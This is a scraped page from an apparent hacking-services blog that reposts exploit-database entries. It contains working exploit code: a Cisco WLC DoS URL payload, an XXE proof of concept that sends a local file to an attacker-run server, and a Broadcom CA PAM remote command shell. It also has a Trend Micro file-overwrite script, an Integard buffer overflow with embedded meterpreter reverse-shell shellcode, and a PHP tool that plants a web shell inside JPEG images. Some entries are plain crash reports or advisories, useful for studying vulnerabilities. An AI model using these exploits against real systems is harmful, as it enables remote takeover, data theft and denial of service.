# Exploit Title: Cisco WLC 2504 8.9 - Denial of Service (PoC)
# Google Dork: N/A
# Date: 2019-11-25
# Exploit Author: SecuNinja
# Vendor Homepage: cisco.com
# Software Link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-wlc-dos
# Version: 8.4 to 8.9
# Tested on: not applicable, works independent from OS
# CVE : CVE-2019-15276
# Exploit PoC:
https://WLCIPorHostname/screens/dashboard.html#/RogueApDetail/00:00:00:00:00:00">'><img src="xxxxx">
# Firing this code will cause the system to reload which results in a DoS condition.
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863595278
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Microsoft Visual Basic 2010 Express - XML External Entity Injection
# Exploit Author: ZwX
# Exploit Date: 2019-12-03
# Version Software : 10.0.30319.1 RTMRel
# Vendor Homepage : https://www.microsoft.com/
# Software Link: https://dotnet.developpez.com/telecharger/detail/id/593/Visual-Studio-2010-Express
# Tested on OS: Windows 7
[+] Exploit : (PoC)
===================
1) python -m SimpleHTTPServer 8000
2) Create file (.xml)
3) Create file Payload.dtd
4) Open the software Microsoft Visual Basic 2010
5) Drag the file (.xml) in a VB project
6) External Entity Injection Successful
[+] XXE.xml :
==============
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
[+] Payload.dtd :
=================
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
%all;
[+] Result Exploitation :
=========================
C:\>python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /payload.dtd HTTP/1.1" 200 -
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
Files%5D%0D%0Acolumns=193;100;60;89;100;160; HTTP/1.1" 301 -
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
Files%5D%0D%0Acolumns=193;100;60;89;100;160;/ HTTP/1.1" 200 -
Microsoft Visual Basic 2010 Express - XML External Entity Injection.txt
# Exploit Title: Microsoft Visual Basic 2010 Express - XML External Entity Injection
# Exploit Author: ZwX
# Exploit Date: 2019-12-03
# Version Software : 10.0.30319.1 RTMRel
# Vendor Homepage : https://www.microsoft.com/
# Software Link: https://dotnet.developpez.com/telecharger/detail/id/593/Visual-Studio-2010-Express
# Tested on OS: Windows 7
[+] Exploit : (PoC)
===================
1) python -m SimpleHTTPServer 8000
2) Create file (.xml)
3) Create file Payload.dtd
4) Open the software Microsoft Visual Basic 2010
5) Drag the file (.xml) in a VB project
6) External Entity Injection Successful
[+] XXE.xml :
==============
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
[+] Payload.dtd :
=================
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
%all;
[+] Result Exploitation :
=========================
C:\>python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /payload.dtd HTTP/1.1" 200 -
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
Files%5D%0D%0Acolumns=193;100;60;89;100;160; HTTP/1.1" 301 -
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
Files%5D%0D%0Acolumns=193;100;60;89;100;160;/ HTTP/1.1" 200 -
#Exploit Title: NETGATE Data Backup 3.0.620 - 'NGDatBckpSrv' Unquoted Service Path
#Exploit Author : ZwX
#Exploit Date: 2019-12-04
#Vendor Homepage : http://www.netgate.sk/
#Link Software : http://www.netgate.sk/download/download.php?id=5
#Tested on OS: Windows 7
#Analyze PoC :
==============
C:\Users\ZwX>sc qc NGDatBckpSrv
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: NGDatBckpSrv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Data Backup\DataBackupSrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : NETGATE Data Backup Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Title: Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution
# Author: Peter Lapp
# Date: 2019-12-05
# Vendor: https://techdocs.broadcom.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html
# CVE: CVE-2018-9021 and CVE-2018-9022
# Tested on: v2.8.2
import urllib2
import urllib
import ssl
import sys
import json
import base64
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
def send_command(ip, cmd):
cmd = urllib.quote_plus(cmd)
url = 'https://'+ip+'/ajax_cmd.php?cmd=AD_IMPORT&command=add&groupId=123&importID=|'+cmd+'+2>%261||&deviceMode=test'
request = urllib2.Request(url, None)
response = urllib2.urlopen(request, context=ctx)
result = json.load(response)
return result['responseData']
def get_db_value():
cmd = "echo select value from configuration_f where name = 'ssl_vpn_network' | mysql -u root uag"
db_value = send_command(ip,cmd)
db_value = db_value.split('\n')[1]
return db_value
def encode_payload(cmd):
sql_string = "update configuration_f set value='\\';"+cmd+" > /tmp/output;\\'' where name='ssl_vpn_network'"
cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
return cmd
def restore_sql(value):
sql_string = "update configuration_f set value='"+value+"' where name='ssl_vpn_network'"
cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
send_command(ip,cmd)
def main():
print '''Xceedium Command Execution PoC by Peter Lapp(lappsec)'''
if len(sys.argv) != 2:
print "Usage: xceedium_rce.py <target ip>"
sys.exit()
global ip
ip = sys.argv[1]
print 'Enter commands below. Type exit to quit'
while True:
cmd = raw_input('# ')
if cmd == "exit":
sys.exit()
orig_value = get_db_value()
payload = encode_payload(cmd)
send_command(ip, payload)
send_command(ip, 'echo -e openvpn\\n | ncat --send-only 127.0.0.1 2210')
output = send_command(ip, 'cat /tmp/output')
print output
restore_sql(orig_value)
if __name__ == "__main__":
main()
#Exploit Title: Amiti Antivirus 25.0.640 - Unquoted Service Path
#Exploit Author : ZwX
#Exploit Date: 2019-12-04
#Vendor Homepage : http://www.netgate.sk/
#Link Software : https://www.netgate.sk/download/download.php?id=11
#Tested on OS: Windows 7
#Analyze PoC :
==============
C:\Users\ZwX>sc qc ScsiAccess
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: AmitiAvHealth
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusHealth.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Amiti Antivirus Health Check
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\ZwX>sc qc AmitiAvSrv
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: AmitiAvSrv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusSrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Amiti Antivirus Engine Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit Title: Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite
# Exploit Author : Peter Lapp
# Exploit Date: 2019-12-05
# Vendor Homepage : https://www.trendmicro.com/en_us/business.html
# Link Software : https://help.deepsecurity.trendmicro.com/software.html?regs=NABU&prodid=1716
# Tested on OS: v11.0.582 and v10.0.3186 on Windows Server 2012 R2, 2008R2, and 7 Enterprise.
# CVE: 2019-15627
# CVE-2019-15627 - Trend Micro Deep Security Agent Local File Overwrite Exploit by Peter Lapp (lappsec)
# This script uses the symboliclink-testing-tools project, written by James Forshaw ( https://github.com/googleprojectzero/symboliclink-testing-tools )
# The vulnerability allows an unprivileged local attacker to delete any file on the filesystem, or overwrite it with abritrary data hosted elsewhere (with limitations)
# This particular script will attempt to overwrite the file dsa_control.cmd with arbitrary data hosted on an external web server, partly disabling TMDS,
# even when agent self-protection is turned on. It can also be modified/simplified to simply delete the target file, if desired.
# When TMDS examines javascript it writes snippets of it to a temporary file, which is locked and then deleted almost immediately.
# The names of the temp files are sometimes reused, which allows us to predict the filename and redirect to another file.
# While examining the JS, it generally strips off the first 4096 bytes or so, replaces those with spaces, converts the rest to lowercase and writes it to the temp file.
# So the attacker can host a "malicious" page that starts with the normal html and script tags, then fill the rest of the ~4096 bytes with garbage,
# then the payload to be written, then a few hundred trailing spaces (not sure why, but they are needed). The resulting temp file will start with 4096 spaces,
# and then the lowercase payload. Obviously this has some limitations, like not being able to write binaries, but there are plenty of config files that
# are ripe for the writing that can then point to a malicious binary.
# Usage:
# 1. First you'd need to host your malicious file somewhere. If you just want to delete the target file or overwrite it with garbage, skip this part.
# 2. Open a browser (preferrably IE) and start the script
# 3. Browse to your malicious page (if just deleting the target file, browse to any page with javascript).
# 4. Keep refreshing the page until you see the script create the target file overwritten.
#
# It's a pretty dumb/simple script and won't work every time, so if it doesn't work just run it again. Or write a more reliable exploit.
import time
import os
import subprocess
import sys
import webbrowser
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
class Stage1_Handler(FileSystemEventHandler):
def __init__(self):
self.filenames = []
def on_created(self, event):
filename = os.path.basename(event.src_path)
if filename in self.filenames:
print ('Starting symlink creation.')
watcher1.stop()
symlinkery(self.filenames)
else:
self.filenames.append(filename)
print ('File %s created.') % filename
class Stage2_Handler(FileSystemEventHandler):
def on_any_event(self, event):
if os.path.basename(event.src_path) == 'dsa_control.cmd':
print "Target file overwritten/deleted. Cleaning up."
subprocess.Popen("taskkill /F /T /IM CreateSymlink.exe", shell=True)
subprocess.Popen("taskkill /F /T /IM Baitandswitch.exe", shell=True)
os.system('rmdir /S /Q "C:\\ProgramData\\Trend Micro\\AMSP\\temp\\"')
os.system('rmdir /S /Q "C:\\test"')
os.rename('C:\\ProgramData\\Trend Micro\\AMSP\\temp-orig','C:\\ProgramData\\Trend Micro\\AMSP\\temp')
watcher2.stop()
sys.exit(0)
class Watcher(object):
def __init__(self, event_handler, path_to_watch):
self.event_handler = event_handler
self.path_to_watch = path_to_watch
self.observer = Observer()
def run(self):
self.observer.schedule(self.event_handler(), self.path_to_watch)
self.observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
self.observer.stop()
self.observer.join()
def stop(self):
self.observer.stop()
def symlinkery(filenames):
print "Enter symlinkery"
for filename in filenames:
print "Creating symlink for %s" % filename
cmdname = "start cmd /c CreateSymlink.exe \"C:\\test\\virus\\%s\" \"C:\\test\\test\\symtarget\"" % filename
subprocess.Popen(cmdname, shell=True)
os.rename('C:\\ProgramData\\Trend Micro\\AMSP\\temp','C:\\ProgramData\\Trend Micro\\AMSP\\temp-orig')
os.system('mklink /J "C:\\ProgramData\\Trend Micro\\AMSP\\temp" C:\\test')
watcher2.run()
print "Watcher 2 started"
try:
os.mkdir('C:\\test')
except:
pass
path1 = 'C:\\ProgramData\\Trend Micro\\AMSP\\temp\\virus'
path2 = 'C:\\Program Files\\Trend Micro\\Deep Security Agent\\'
watcher1 = Watcher(Stage1_Handler,path1)
watcher2 = Watcher(Stage2_Handler,path2)
switcheroo = "start cmd /c BaitAndSwitch.exe C:\\test\\test\\symtarget \"C:\\Program Files\\Trend Micro\\Deep Security Agent\\dsa_control.cmd\" \"C:\\windows\\temp\\deleteme.txt\" d"
subprocess.Popen(switcheroo, shell=True)
watcher1.run()
Exploit Title: Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow
Date: 2019-09-22
Exploit Author: purpl3f0xsecur1ty
Vendor Homepage: https://www.tucows.com/
Software Link: http://www.tucows.com/preview/519612/Integard-Home
Version: Pro 2.2.0.9026 / Home 2.0.0.9021
Tested on: Windows XP / Win7 / Win10
CVE: CVE-2019-16702
#!/usr/bin/python
########################################################
#~Integard Pro 2.2.0.9026 "NoJs" EIP overwrite exploit~#
#~~~~~~~~~~~~~~~~Authored by purpl3f0x~~~~~~~~~~~~~~~~~#
# The vulnerability: Integard fails to sanitize input #
# to the "NoJs" parameter in an HTTP POST request, #
# resulting in a stack buffer overflow that overwrites #
# the instruction pointer, leading to remote code #
# execution. #
########################################################
import socket
import os
import sys
from struct import pack
def main():
print "~*Integard RCE Exploit for XP/7/10*~"
print "Chose target: (Enter number only)"
print "1) - Windows XP"
print "2) - Windows 7/10"
target = str(input())
host = "10.0.0.130"
port = 18881
####################################################
# Integard's functionality interferes with reverse #
# and bind shells. Only Meterpreter seems to work. #
####################################################
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=9001
# -b "\x00\x26\x2f\x3d\x3f\x5c" -f python -v meterpreter EXITFUNC=thread
meterpreter = "\x90" * 50
meterpreter += "\xda\xcd\xbe\xa2\x51\xce\x97\xd9\x74\x24\xf4"
meterpreter += "\x5f\x2b\xc9\xb1\x5b\x83\xef\xfc\x31\x77\x15"
meterpreter += "\x03\x77\x15\x40\xa4\x32\x7f\x06\x47\xcb\x80"
meterpreter += "\x66\xc1\x2e\xb1\xa6\xb5\x3b\xe2\x16\xbd\x6e"
meterpreter += "\x0f\xdd\x93\x9a\x84\x93\x3b\xac\x2d\x19\x1a"
meterpreter += "\x83\xae\x31\x5e\x82\x2c\x4b\xb3\x64\x0c\x84"
meterpreter += "\xc6\x65\x49\xf8\x2b\x37\x02\x77\x99\xa8\x27"
meterpreter += "\xcd\x22\x42\x7b\xc0\x22\xb7\xcc\xe3\x03\x66"
meterpreter += "\x46\xba\x83\x88\x8b\xb7\x8d\x92\xc8\xfd\x44"
meterpreter += "\x28\x3a\x8a\x56\xf8\x72\x73\xf4\xc5\xba\x86"
meterpreter += "\x04\x01\x7c\x78\x73\x7b\x7e\x05\x84\xb8\xfc"
meterpreter += "\xd1\x01\x5b\xa6\x92\xb2\x87\x56\x77\x24\x43"
meterpreter += "\x54\x3c\x22\x0b\x79\xc3\xe7\x27\x85\x48\x06"
meterpreter += "\xe8\x0f\x0a\x2d\x2c\x4b\xc9\x4c\x75\x31\xbc"
meterpreter += "\x71\x65\x9a\x61\xd4\xed\x37\x76\x65\xac\x5f"
meterpreter += "\xbb\x44\x4f\xa0\xd3\xdf\x3c\x92\x7c\x74\xab"
meterpreter += "\x9e\xf5\x52\x2c\x96\x11\x65\xe2\x10\x71\x9b"
meterpreter += "\x03\x61\x58\x58\x57\x31\xf2\x49\xd8\xda\x02"
meterpreter += "\x75\x0d\x76\x08\xe1\xa4\x87\x0c\x71\xd0\x85"
meterpreter += "\x0c\x52\x08\x03\xea\xc4\x1a\x43\xa2\xa4\xca"
meterpreter += "\x23\x12\x4d\x01\xac\x4d\x6d\x2a\x66\xe6\x04"
meterpreter += "\xc5\xdf\x5f\xb1\x7c\x7a\x2b\x20\x80\x50\x56"
meterpreter += "\x62\x0a\x51\xa7\x2d\xfb\x10\xbb\x5a\x9c\xda"
meterpreter += "\x43\x9b\x09\xdb\x29\x9f\x9b\x8c\xc5\x9d\xfa"
meterpreter += "\xfb\x4a\x5d\x29\x78\x8c\xa1\xac\x49\xe7\x94"
meterpreter += "\x3a\xf6\x9f\xd8\xaa\xf6\x5f\x8f\xa0\xf6\x37"
meterpreter += "\x77\x91\xa4\x22\x78\x0c\xd9\xff\xed\xaf\x88"
meterpreter += "\xac\xa6\xc7\x36\x8b\x81\x47\xc8\xfe\x91\x80"
meterpreter += "\x36\x7d\xbe\x28\x5f\x7d\xfe\xc8\x9f\x17\xfe"
meterpreter += "\x98\xf7\xec\xd1\x17\x38\x0d\xf8\x7f\x50\x84"
meterpreter += "\x6d\xcd\xc1\x99\xa7\x93\x5f\x9a\x44\x08\x6f"
meterpreter += "\xe1\x25\xaf\x90\x16\x2c\xd4\x90\x17\x50\xea"
meterpreter += "\xad\xce\x69\x98\xf0\xd3\xcd\x83\xee\xf9\x3b"
meterpreter += "\x2c\xb7\x68\x86\x31\x48\x47\xc5\x4f\xcb\x6d"
meterpreter += "\xb6\xab\xd3\x04\xb3\xf0\x53\xf5\xc9\x69\x36"
meterpreter += "\xf9\x7e\x89\x13"
if target == "1":
print "[*] Sending Windows XP payload using meterpreter/reverse_tcp"
# JMP ESP at 0x3E087557 in iertutil.dll
crash = "A" * 512
crash += pack("<L",0x3E087557)
crash += meterpreter
crash += "C" * (1500 - len(crash))
buffer = ""
buffer += "POST /LoginAdmin HTTP/1.1\r\n"
buffer += "Host: 10.0.0.130:18881\r\n"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer += "Accept-Language: en-US,en;q=0.5\r\n"
buffer += "Accept-Encoding: gzip, deflate\r\n"
buffer += "Referer: http://10.0.0.130:18881/\r\n"
buffer += "Connection: close\r\n"
buffer += "Upgrade-Insecure-Requests: 1\r\n"
buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
buffer += "Content-Length: 78\r\n\r\n"
buffer += "Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=" + crash + "&LoginButtonName=Login\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(buffer)
s.close()
print "[*] Done"
if target == "2":
print "[*] Sending Windows 7/10 payload using meterpreter/reverse_tcp"
# ASLR IS ON!!! MUST USE NON-ASLR MODULE!
# POP POP RET in integard.exe (ASLR disabled)
nSEH = "\xEB\xD0\x90\x90" # Jump 48 bytes backwards
SEH = pack("<L",0x004042B0)
jumpCall = "\xEB\x09" # Jump 11 bytes forward to hit the CALL in bigBackJump
bigBackJump = "\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF"
crash = "\x90" * (2776 -len(jumpCall) - len(bigBackJump) - len(meterpreter) - 50)
crash += meterpreter
crash += "\x90" * 50
crash += jumpCall
crash += bigBackJump
crash += nSEH
crash += SEH
buffer = ""
buffer += "POST /LoginAdmin HTTP/1.1\r\n"
buffer += "Host: 10.0.0.130:18881\r\n"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer += "Accept-Language: en-US,en;q=0.5\r\n"
buffer += "Accept-Encoding: gzip, deflate\r\n"
buffer += "Referer: http://10.0.0.130:18881/\r\n"
buffer += "Connection: close\r\n"
buffer += "Upgrade-Insecure-Requests: 1\r\n"
buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
buffer += "Content-Length: 78\r\n\r\n"
buffer += "Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=" + crash + "&LoginButtonName=Login\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(buffer)
s.close()
print "[*] Done"
main()
# Exploit Title: Verot 2.0.3 - Remote Code Execution
# Date: 2019-12-05
# Exploit Author: Jinny Ramsmark
# Vendor Homepage: https://www.verot.net/php_class_upload.htm
# Software Link: https://github.com/verot/class.upload.php
# Version: <=2.0.3
# Tested on: Ubuntu 19.10, PHP 7.3, Apache/2.4.41
# CVE : CVE-2019-19576
<?php
#Title: jpeg payload generator for file upload RCE
#Author: Jinny Ramsmark
#Github: https://github.com/jra89/CVE-2019-19576
#Other: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19576
#Usage: php inject.php
#Output: image.jpg.phar is the file to be used for upload and exploitation
#This script assumes no special transforming is done on the image for this specific CVE.
#It can be modified however for different sizes and so on (x,y vars).
ini_set('display_errors', 1);
error_reporting(E_PARSE);
#requires php, php-gd
$orig = 'image.jpg';
$code = '<?=exec($_GET["c"])?>';
$quality = "85";
$base_url = "http://lorempixel.com";
echo "-=Imagejpeg injector 1.7=-\n";
do
{
$x = 100;
$y = 100;
$url = $base_url . "/$x/$y/";
echo "[+] Fetching image ($x X $y) from $url\n";
file_put_contents($orig, file_get_contents($url));
} while(!tryInject($orig, $code, $quality));
echo "[+] It seems like it worked!\n";
echo "[+] Result file: image.jpg.phar\n";
function tryInject($orig, $code, $quality)
{
$result_file = 'image.jpg.phar';
$tmp_filename = $orig . '_mod2.jpg';
//Create base image and load its data
$src = imagecreatefromjpeg($orig);
imagejpeg($src, $tmp_filename, $quality);
$data = file_get_contents($tmp_filename);
$tmpData = array();
echo "[+] Jumping to end byte\n";
$start_byte = findStart($data);
echo "[+] Searching for valid injection point\n";
for($i = strlen($data)-1; $i > $start_byte; --$i)
{
$tmpData = $data;
for($n = $i, $z = (strlen($code)-1); $z >= 0; --$z, --$n)
{
$tmpData[$n] = $code[$z];
}
$src = imagecreatefromstring($tmpData);
imagejpeg($src, $result_file, $quality);
if(checkCodeInFile($result_file, $code))
{
unlink($tmp_filename);
unlink($result_file);
sleep(1);
file_put_contents($result_file, $tmpData);
echo "[!] Temp solution, if you get a 'recoverable parse error' here, it means it probably failed\n";
sleep(1);
$src = imagecreatefromjpeg($result_file);
return true;
}
else
{
unlink($result_file);
}
}
unlink($orig);
unlink($tmp_filename);
return false;
}
function findStart($str)
{
for($i = 0; $i < strlen($str); ++$i)
{
if(ord($str[$i]) == 0xFF && ord($str[$i+1]) == 0xDA)
{
return $i+2;
}
}
return -1;
}
function checkCodeInFile($file, $code)
{
if(file_exists($file))
{
$contents = loadFile($file);
}
else
{
$contents = "0";
}
return strstr($contents, $code);
}
function loadFile($file)
{
$handle = fopen($file, "r");
$buffer = fread($handle, filesize($file));
fclose($handle);
return $buffer;
}
We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
--- cut ---
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=707779e0 ebx=25876c38 ecx=052faab8 edx=707703a4 esi=707703d4 edi=25876e34
eip=10e6c29e esp=052fa89c ebp=052fa8a4 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210212
CoolType!CTInit+0x3913e:
10e6c29e 8902 mov dword ptr [edx],eax ds:002b:707703a4=31a03194
0:000> u @eip-14
CoolType!CTInit+0x3912a:
10e6c28a 8b7d0c mov edi,dword ptr [ebp+0Ch]
10e6c28d 8b571c mov edx,dword ptr [edi+1Ch]
10e6c290 8b7720 mov esi,dword ptr [edi+20h]
10e6c293 035508 add edx,dword ptr [ebp+8]
10e6c296 8b4724 mov eax,dword ptr [edi+24h]
10e6c299 037508 add esi,dword ptr [ebp+8]
10e6c29c 03c6 add eax,esi
10e6c29e 8902 mov dword ptr [edx],eax
0:000> ? poi(edi+1c)
Evaluate expression: -690332 = fff57764
0:000> ? poi(ebp+8)
Evaluate expression: 1887538240 = 70818c40
0:000> !heap -p -a 70818c40
address 70818c40 found in
_DPH_HEAP_ROOT @ bfc1000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
723d3b94: 70818c40 173c0 - 70818000 19000
unknown!fillpattern
0f32a8d0 verifier!AVrfDebugPageHeapAllocate+0x00000240
77f24b26 ntdll!RtlDebugAllocateHeap+0x0000003c
77e7e3e6 ntdll!RtlpAllocateHeap+0x000000f6
77e7cfb7 ntdll!RtlpAllocateHeapInternal+0x000002b7
77e7ccee ntdll!RtlAllocateHeap+0x0000003e
0f48aa2f vrfcore!VfCoreRtlAllocateHeap+0x0000001f
77c2f1f6 ucrtbase!_malloc_base+0x00000026
5fbefc39 AcroRd32!AcroWinMainSandbox+0x00003ec9
10e37991 CoolType!CTInit+0x00004831
10e38e1b CoolType!CTInit+0x00005cbb
10e68870 CoolType!CTInit+0x00035710
10e683dc CoolType!CTInit+0x0003527c
10e67d25 CoolType!CTInit+0x00034bc5
10e65902 CoolType!CTInit+0x000327a2
10e633f2 CoolType!CTInit+0x00030292
10e62719 CoolType!CTInit+0x0002f5b9
10e620e8 CoolType!CTInit+0x0002ef88
10e62000 CoolType!CTInit+0x0002eea0
108f36f1 AGM!AGMInitialize+0x0002a881
0:000> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 052fa8a4 10e6bde2 70818c40 25876e34 70818c40 CoolType!CTInit+0x3913e
01 052fa918 10e6bd06 052faab4 052fa9e4 00000001 CoolType!CTInit+0x38c82
02 052fa930 10e6bce7 052faab4 052fa9e4 73330f68 CoolType!CTInit+0x38ba6
03 052fa944 10e6bb4f 052faab4 052fa9e4 73330f68 CoolType!CTInit+0x38b87
04 052fa968 10e6b8b0 052facd8 73330f68 110f7080 CoolType!CTInit+0x389ef
05 052fab08 10e6abf9 73330f68 110f7080 052facd8 CoolType!CTInit+0x38750
06 052fad64 10e65b0c 052fb054 052faddc 00000000 CoolType!CTInit+0x37a99
07 052fb07c 10e633f2 000007c6 00000000 00000000 CoolType!CTInit+0x329ac
08 052fb14c 10e62719 65babff0 00000001 052fb1dc CoolType!CTInit+0x30292
09 052fb964 10e620e8 6aa0a9b4 052fb97c 6aa0a990 CoolType!CTInit+0x2f5b9
0a 052fb9e4 10e62000 6aa0a9b4 6aa0a99c 73fdc4da CoolType!CTInit+0x2ef88
0b 052fba24 108f36f1 7155bd90 6aa0a9b4 6aa0a99c CoolType!CTInit+0x2eea0
0c 052fba38 108e023e 6aa0a99c 108e01d0 331cbd80 AGM!AGMInitialize+0x2a881
0d 052fba4c 108df007 331cbd8c 10d84a18 00000001 AGM!AGMInitialize+0x173ce
0e 052fba84 108f0bcc c1574612 1733a7d0 00000000 AGM!AGMInitialize+0x16197
0f 052fbb4c 0f327c7a 0bfc16cc 052fbb78 0f3291ab AGM!AGMInitialize+0x27d5c
--- cut ---
Notes:
- The crash looks very similar to the one reported in Issue #1891 in June 2019, and fixed in August 2019 as CVE-2019-8042. The stack trace and context are nearly identical. It is possible that this is an unfixed variant of the previous vulnerability.
- Reproduces on Adobe Acrobat Reader DC (2019.012.20040) on Windows 10, with and without PageHeap enabled (more cleanly with PageHeap, though).
- The crash occurs immediately after opening the PDF document, and is caused by an attempt to write data at a negative offset relative to a heap allocation (-690332 in the above case).
- Attached samples: poc[1-4].pdf (crashing files).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47769.zip
# Exploit Title: AppXSvc 17763 - Arbitrary File Overwrite (DoS)
# Date: 2019-10-28
# Exploit Author: Gabor Seljan
# Vendor Homepage: https://www.microsoft.com/
# Version: 17763.1.amd64fre.rs5_release.180914-1434
# Tested on: Windows 10 Version 1809 for x64-based Systems
# CVE: CVE-2019-1476
# Summary:
# AppXSvc improperly handles file hard links resulting in a low privileged user
# being able to overwrite an arbitrary file leading to elevation of privilege.
# Description:
# An elevation of privilege vulnerability exists when the AppX Deployment Server
# (AppXSvc) improperly handles file hard links. While researching CVE-2019-0841
# originally reported by Nabeel Ahmed, I have found that AppXSvc can be forced
# to overwrite an arbitrary file by deleting all registry data files before
# creating the file hard link. As Nabeel Ahmed described in his write-up of
# CVE-2019-0841, if the settings.dat file is corrupted it will be replaced with
# the original settings.dat template. However, additional settings.dat.LOG1 and
# settings.dat.LOG2 files are also created during the initialization process.
